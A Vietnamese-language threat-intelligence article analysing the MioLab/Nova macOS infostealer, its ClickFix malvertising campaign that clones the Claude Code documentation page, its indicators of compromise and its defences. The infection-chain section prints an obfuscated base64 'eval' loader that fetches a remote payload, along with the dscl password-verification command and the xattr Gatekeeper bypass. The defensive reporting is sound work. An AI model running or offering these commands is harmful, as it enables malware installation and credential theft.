Mã độc MioLab Nguy Hiểm: Kẻ đánh cắp dữ liệu macOS tinh vi

Một

Mã độc MioLab

infostealer tinh vi dành cho macOS, còn được theo dõi dưới tên Nova, đã nổi lên như một trong những nền tảng Malware-as-a-Service (MaaS) tiên tiến nhất nhắm mục tiêu vào người dùng Apple. Mã độc này được quảng cáo trên các diễn đàn ngầm nói tiếng Nga, đánh dấu một sự thay đổi trong bối cảnh mối đe dọa, chứng tỏ macOS không còn là mục tiêu có rủi ro thấp.

Khi thị phần của Apple tăng lên trong số các kỹ sư phần mềm, giám đốc điều hành và nhà đầu tư tiền điện tử, những kẻ tấn công hiện coi máy Mac là bề mặt tấn công mang lại lợi nhuận cao.

Nội dung

Kiến Trúc và Khả Năng Vận Hành của Mã độc MioLab

Tính Năng Đánh Cắp Dữ Liệu

Mức Độ Phát Triển Nhanh Chóng và Hệ Sinh Thái MioLab

Các Nâng Cấp Quan Trọng

Hạ Tầng Hoạt Động của Kẻ Tấn Công

Kỹ Thuật Xâm Nhập ClickFix của Mã độc MioLab

Chiến Dịch Malvertising Thực Tế

Chi Tiết Chuỗi Lây Nhiễm trên macOS

Thu Thập và Tải Lên Dữ Liệu

Chỉ Số Lây Nhiễm (IOCs)

Biện Pháp Phòng Chống và Bảo Mật macOS

Đối Với Người Dùng

Đối Với Đội Ngũ Bảo Mật

Kiến Trúc và Khả Năng Vận Hành của Mã độc MioLab

Mã độc MioLab sử dụng một bảng điều khiển web thân thiện với người dùng và một payload C nhẹ, có kích thước khoảng 100 KB. Kích thước nhỏ gọn này giúp nó né tránh các phương pháp phát hiện antivirus dựa trên chữ ký cơ bản.

MioLab hỗ trợ cả kiến trúc Intel x86-64 và Apple Silicon ARM64, chạy trên các phiên bản macOS từ Sierra đến Tahoe. Điều này đảm bảo khả năng tương thích rộng rãi trên các hệ thống Mac hiện đại.

Tính Năng Đánh Cắp Dữ Liệu

Các khả năng của mã độc MioLab bao gồm:

Đánh cắp thông tin đăng nhập trình duyệt.
Rút tiền từ ví tiền điện tử.
Thu thập mật khẩu từ các trình quản lý mật khẩu.
Thu thập tệp tin có giá trị.

Một module tiện ích bổ sung cao cấp của mã độc MioLab nhắm mục tiêu vào các ví phần cứng như Ledger và Trezor. Module này có khả năng đánh cắp cụm từ khôi phục BIP39 gồm 24 từ của nạn nhân, gây ra nguy cơ mất mát tài sản số nghiêm trọng.

Mức Độ Phát Triển Nhanh Chóng và Hệ Sinh Thái MioLab

Các nhà phân tích của LevelBlue đã xác định mã độc MioLab là một mối đe dọa đang phát triển nhanh chóng. Họ lưu ý rằng tốc độ phát triển của nó là bất thường đối với một infostealer. Để biết thêm chi tiết về phân tích của LevelBlue, tham khảo tại đây.

Các Nâng Cấp Quan Trọng

Xem xét các nhật ký thay đổi đến tháng 2 năm 2026, các nhà nghiên cứu đã xác nhận các nâng cấp quan trọng, bao gồm:

Module trích xuất ví phần cứng được xây dựng lại.
Khả năng giải mã Apple Notes ngay trên thiết bị.
Công cụ lấy cookie Safari hoạt động hiệu quả.
API nhóm (Team API) đầy đủ chức năng.

API này cho phép các nhóm tội phạm tạo payload và tải xuống các nhật ký bị đánh cắp một cách có lập trình, mà không cần đăng nhập vào bảng điều khiển. Điều này tối ưu hóa quy trình hoạt động của những kẻ tấn công.

Nền tảng của mã độc MioLab cũng tích hợp liên kết Telegram bot để thông báo nạn nhân theo thời gian thực. Tính năng này phục vụ các nhóm tội phạm mạng có tổ chức, được gọi là traffers.

Hạ Tầng Hoạt Động của Kẻ Tấn Công

Phân tích hạ tầng cho thấy các nhà điều hành của mã độc MioLab điều hành một hệ sinh thái tội phạm mạng rộng lớn hơn.

Bảng điều khiển quản trị của mã độc MioLab trước đây được lưu trữ trên playavalon[.]org. Hiện tại, địa chỉ này đã được chuyển hướng để phục vụ một chiến dịch lừa đảo Ethereum token airdrop phishing. Mục đích là chuyển đổi lưu lượng truy cập còn lại từ các chỉ số cũ thành hoạt động gian lận mới.

Cả hai hoạt động đều có nguồn gốc từ FEMO IT Solutions Ltd., một nhà cung cấp dịch vụ lưu trữ bulletproof hosting dưới thương hiệu Defhost. Nhà cung cấp này che chắn nhiều họ mã độc khỏi sự truy quét của pháp luật.

Kỹ Thuật Xâm Nhập ClickFix của Mã độc MioLab

Một trong những bổ sung đáng chú ý nhất của mã độc MioLab là chuỗi lây nhiễm ClickFix. Đây là một kỹ thuật lừa nạn nhân chạy các lệnh độc hại trong chính Terminal của macOS của họ.

Bảng điều khiển của mã độc MioLab bao gồm một tiện ích một lần nhấp. Tại đây, các nhà khai thác nhập thông tin đăng nhập máy chủ của họ. Hệ thống ngay lập tức tạo ra một payload Terminal sẵn sàng triển khai thông qua các trang CAPTCHA giả mạo hoặc các cổng nhà phát triển được sao chép.

Chiến Dịch Malvertising Thực Tế

Ngay trước khi công bố, nhà nghiên cứu Marcelo Rivero đã xác định một chiến dịch malvertising đang hoạt động. Chiến dịch này phân phối mã độc MioLab thông qua một bản sao rất thuyết phục của trang tài liệu Claude Code. Claude Code là một công cụ AI dòng lệnh hợp pháp của Anthropic.

Chiến dịch này được xây dựng chính xác để nhắm mục tiêu vào các đối tượng có giá trị cao, cụ thể là các nhà phát triển. Những người này đã quen thuộc với việc chạy các lệnh Terminal.

Trang web giả mạo phục vụ hướng dẫn cài đặt hoàn toàn hợp pháp cho người dùng Windows, vượt qua kiểm tra trực quan một cách sạch sẽ. Tuy nhiên, đối với người dùng macOS, nó lại cung cấp một payload theo kiểu ClickFix.

Chi Tiết Chuỗi Lây Nhiễm trên macOS

Giai đoạn đầu tiên của cuộc tấn công dựa vào một URL được mã hóa Base64. Khi được giải mã và thực thi, URL này khởi chạy một curl loader để tìm nạp payload Mach-O. Payload này sau đó được thả vào thư mục /tmp và chạy lệnh xattr -c để loại bỏ thuộc tính Quarantine của Apple, qua đó bỏ qua Gatekeeper.

/bin/bash -c "eval $(echo 'aHR0cHM6Ly9tYWxpY2lvdXNkZWFkYmVlZi5jb20vdWJ1bnR1L2luc3RhbGxAc29jaWZpYXBwLGNvbS81NDc4NDE0ODgyYmI0ZGEwYTFhNzg1ODg2MmNlNzE4MS8zYzQxY2ExYzg5MDI1NmM3ODQwMWY3OTY1ZjI5MzM2OA==' | base64 -d)"

Sau khi vượt qua Gatekeeper, mã độc MioLab đã đóng các cửa sổ Terminal đang mở. Nó hiển thị một hộp thoại mật khẩu System Preferences giả mạo thông qua AppleScript, lừa người dùng nhập thông tin đăng nhập của họ.

Mật khẩu bị đánh cắp sau đó được xác minh chống lại dịch vụ thư mục cục bộ bằng tiện ích dscl.

dscl /Local/Default -authonly username password

Thu Thập và Tải Lên Dữ Liệu

Một khi được xác nhận, mã độc MioLab bắt đầu thu thập các loại dữ liệu sau:

Cookie trình duyệt.
Mật khẩu.
Tệp ví tiền điện tử.
Apple Notes.
Dữ liệu phiên Telegram.
Tài liệu từ các thư mục Desktop và Downloads của người dùng.

Sau khi thu thập, tất cả dữ liệu được nén vào một kho lưu trữ ZIP và tải lên máy chủ Command-and-Control (C2) của kẻ tấn công. Đây là một điển hình của việc đánh cắp dữ liệu nhạy cảm.

Chỉ Số Lây Nhiễm (IOCs)

Các miền độc hại đã biết liên quan đến mã độc MioLab bao gồm:

playavalon[.]org
socifiapp[.]com

Biện Pháp Phòng Chống và Bảo Mật macOS

Để bảo vệ chống lại mã độc MioLab, các nhóm bảo mật và người dùng nên thực hiện các biện pháp phòng ngừa sau:

Đối Với Người Dùng

Người dùng phải được đào tạo để nghi ngờ các lời nhắc mật khẩu không mong muốn từ các ứng dụng vừa tải xuống. Luôn xác minh tính hợp pháp của mọi yêu cầu xác thực.

Đối Với Đội Ngũ Bảo Mật

Các đội bảo mật nên chặn hoặc giám sát các tiện ích hệ thống nhạy cảm như dscl, osascript và system_profiler khi chúng được gọi bởi các ứng dụng không có chữ ký.
Truy cập vào các thư mục hồ sơ trình duyệt và tệp macOS Keychain login.keychain-db nên được kiểm tra nghiêm ngặt.
Các miền độc hại đã biết, bao gồm socifiapp[.]com, phải được chặn ở cấp độ mạng.
Bất kỳ yêu cầu curl POST đáng ngờ nào tới các API bên ngoài phải được gắn cờ và điều tra kịp thời để ngăn chặn phát hiện xâm nhập.